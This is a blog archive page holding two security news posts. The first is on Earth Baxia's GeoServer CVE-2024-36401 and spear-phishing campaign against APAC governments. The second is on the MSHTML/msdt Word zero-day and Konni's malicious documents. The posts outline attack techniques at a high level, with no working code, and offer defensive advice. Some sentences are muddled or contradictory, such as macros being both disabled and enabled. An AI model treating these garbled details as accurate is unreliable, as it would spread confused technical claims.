Search This Blog
Powered by Blogger.

Blog Archive

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label Cyber Exploits. Show all posts
GeoServer
APAC Cyber Exploits Cyber Security Cyberattacks CyberCrime Cyberthreats Earth Baxia GeoServer

Earth Baxia Exploits GeoServer to Launch APAC Spear-Phishing Attacks


 

An analysis by Trend Micro indicates that the cyber espionage group Earth Baxia has been attempting to target government agencies in Taiwan, as well as potentially other countries in the Asia-Pacific (APAC) region, through spear-phishing campaigns and exploitation of a critical GeoServer vulnerability known as CVE-2024-36401, a critical security vulnerability. 

It is part of an ongoing campaign intended to infiltrate key sectors of society, including one of the most vital sectors of the economy: telecommunications, energy, and government. There are several vulnerabilities within GeoServer, an open-source platform for sharing geospatial data, which may allow hackers to execute remote code through an exploit known as CVE-2024-36401. 

Earth Baxia could exploit this vulnerability by downloading malicious components directly into the victim environment, using tools such as "curl" and "scp" to cast harmful files, including customized Cobalt Strike beacons, and other payloads directly into the victim's environment. By deploying these payloads, attackers were able to execute arbitrary commands inside compromised systems, which gave them a foothold within those compromised environments. 

The Earth Baxia threat actor used a wide range of technologies to break into several countries in the Asia-Pacific region, targeting government organizations, telecommunications companies, and the energy industry. During the attack, the group employed sophisticated techniques, like spear-phishing emails and exploiting a GeoServer vulnerability (CVE-2024-36401) to achieve their goal. 

The attackers deployed custom Cobalt Strike components as well as a new backdoor, called EAGLEDOOR, on computers that were compromised. Multiple communication protocols can be used to gather information and deliver payloads for EAGLEDOOR. To be able to track these attackers, they utilized public cloud services to host the malicious files. 

It was also possible to deploy additional payloads via methods such as GrimResource injection and AppDomainManager injection, which were utilized by them. Among the countries that were affected by this campaign are Taiwan, the Philippines, South Korea, Vietnam, Thailand, and possibly China as well. The subject lines in most of the emails are meticulously tailored with varying content, and the attachment ZIP file contains a decoy MSC file called RIPCOY which is used as a decoy file in the email subject lines. 

By double-clicking this file, the embedded obfuscated VBScript will attempt to download multiple files from a public cloud service, typically Amazon Web Services via a mechanism called GrimResource, which extracts the data from the cloud service in the best way possible. In addition to the decoy PDF document, there are also .NET applications and a configuration file included in this pack. 

As a result of being dropped by the MSC file, .NET applications and configuration files became vulnerable to malicious injection as a result of using a technique known as AppDomainManager injection. This allows the injection of a custom application domain within the target application process so that it can run arbitrary code. 

It's a mechanism that provides the ability for any .NET application to load an arbitrarily managed DLL on its own, either locally or remotely, without directly invoking any Windows API calls, and it can be used in any scenario. The next-stage downloader is downloaded by legit .NET applications based on a URL specified in the application configuration file (.config), which points to a file that includes a .NET DLL. 

To encrypt the URL of this download, it has been encrypted in Base64 with AES obfuscation. During this stage, most of the download sites available for downloading through public cloud services, usually Aliyun were considered to be hosting websites. After retrieving the shellcode from the DLL, it executes it using the CreateThread API, with all processes being executed in the DLL being run entirely in memory at the same time. Vision One Threat Intelligence from Trend Micro provides the following features:  

Keeping pace with emerging threats is Trend Micro customers' number one priority, which is why Trend Micro Vision One users have access to a range of Intelligence Reports and Threat Insights. With Threat Insights, customers will be able to stay on top of cyber threats long before they happen and be more prepared when new cyber threats emerge. This report contains comprehensive information about threat actors, their malicious activities, and the techniques that they employ to harm users. 

Using this intelligence as a basis for proactive measures, customers can reduce their risks and ensure that they respond effectively to threats by taking proactive steps to protect their environment. In the context of various countries in the Asian Pacific region, Earth Baxia is likely to be based in China and carry out sophisticated campaigns targeting the government and energy sectors. 

To infiltrate and exfiltrate data, they employ advanced tactics such as GeoServer exploitation, spear-phishing, customized malware (Cobalt Strike and EAGLEDOOR), and a combination of these. Even though EAGLEDOOR uses public cloud services for hosting malicious files and supports a wide range of protocols, their operations are complex and highly adaptable as a result. 

Continuous vigilance and sophisticated threat detection measures are essential for such threats to be dealt with effectively. To mitigate the risks associated with such threats, security teams are advised to implement several best practices. One critical measure is the implementation of continuous phishing awareness training for all employees. This ensures that staff remain informed about evolving phishing techniques and are better equipped to identify and respond to malicious attempts. 

Additionally, employees should be encouraged to thoroughly verify the sender and subject of any emails, especially those originating from unfamiliar sources or containing ambiguous subject lines. This practice helps in identifying potentially harmful communications before they lead to further complications. It is equally important to deploy multi-layered protection solutions, which serve to detect and block threats early in the malware infection chain. Such solutions enhance the organization’s overall security posture by providing multiple defences, significantly reducing the likelihood of a successful attack.
Read more »
Vulnerablities and Exploits
Cyber Exploits CyberCrime Document Document Scam Ms Words MSHTML Scam Alert skype Visual Studio Vulnerablities and Exploits

Word Document Scam Alert: Windows Users Vulnerable to Cyber Exploits

 


As a result of a recently discovered bug, hackers are able to execute remote code in all versions of Microsoft's proprietary MSHTML browser engine without having to install the application. There is a zero-day vulnerability in Microsoft Word that attackers are taking advantage of by crafting specially crafted documents. 

Microsoft's products such as Skype, Visual Studio, and Microsoft Outlook, as well as several others, also use MSHTML, so the problem really is widespread, since MSHTML is also used by several Microsoft products. A zero-day vulnerability in a Windows tool has been exploited by hackers via malicious Word documents to be able to compromise networks that have been protected by Microsoft's workaround for administrators. 

The Google-owned antivirus service VirusTotal detected a malicious Word document uploaded on 25 May from a Belarusian IP address on its website that was uploaded on the weekend.  As a result of Kevin Beaumont's analysis, he discovered that despite macros being disabled, the malicious document - or "malloc" - was able to generate code through the legitimate Microsoft Support Diagnostic Tool (msdt.exe) despite the fact that macros were enabled. 

MSDT is accessed through the ms-msdt URL protocol in Windows from the malicious Word document in order to execute the malware. There is now a "troubleshooter pack" available for download from the MSDT website.  Using malicious Microsoft Word documents, North Koreans are attempting to steal sensitive information from Russian targets by exploiting the weaknesses in the security software. 

A Fortinet researcher named Cara Lin made the following observation about how a group called Konni (although there are so many similarities between it and Kimsuky aka APT43 that it is also possible that it could be this group) attempted to deliver a malicious Russian-language Microsoft document in the form of an attachment. This malware has the appearance of a macro, which is typical of malware that is downloaded as a file. 

According to the document that is being distributed, there is an article in the Russian language, which apparently describes Western assessments on the progress of the Special Military Operation. It is noted in the piece that The Hacker News commented that Konni is a "notable" application for its anti-Russian values.  

A majority of the time, the group would engage in spear-phishing emails and malicious documents in an attempt to gain access to targets' endpoints, which was done by spear-phishing. It has been reported that earlier attacks taken advantage of a vulnerability in WinRAR (CVE-2023-38831) were spotted by cybersecurity researchers Knowsec and ThreatMon, it has been reported. 

A major objective of Konni is to smuggle data and conduct espionage activities around the world, as reported by ThreatMon. During this process, the group uses a wide array of malware and tools in order to accomplish its objectives, frequently adapting its tactics in order to avoid detection by the authorities. The sabotage of Russian firms by North Korean hackers is not the first instance on which we have seen similar attacks.
Read more »
Subscribe to: Posts (Atom)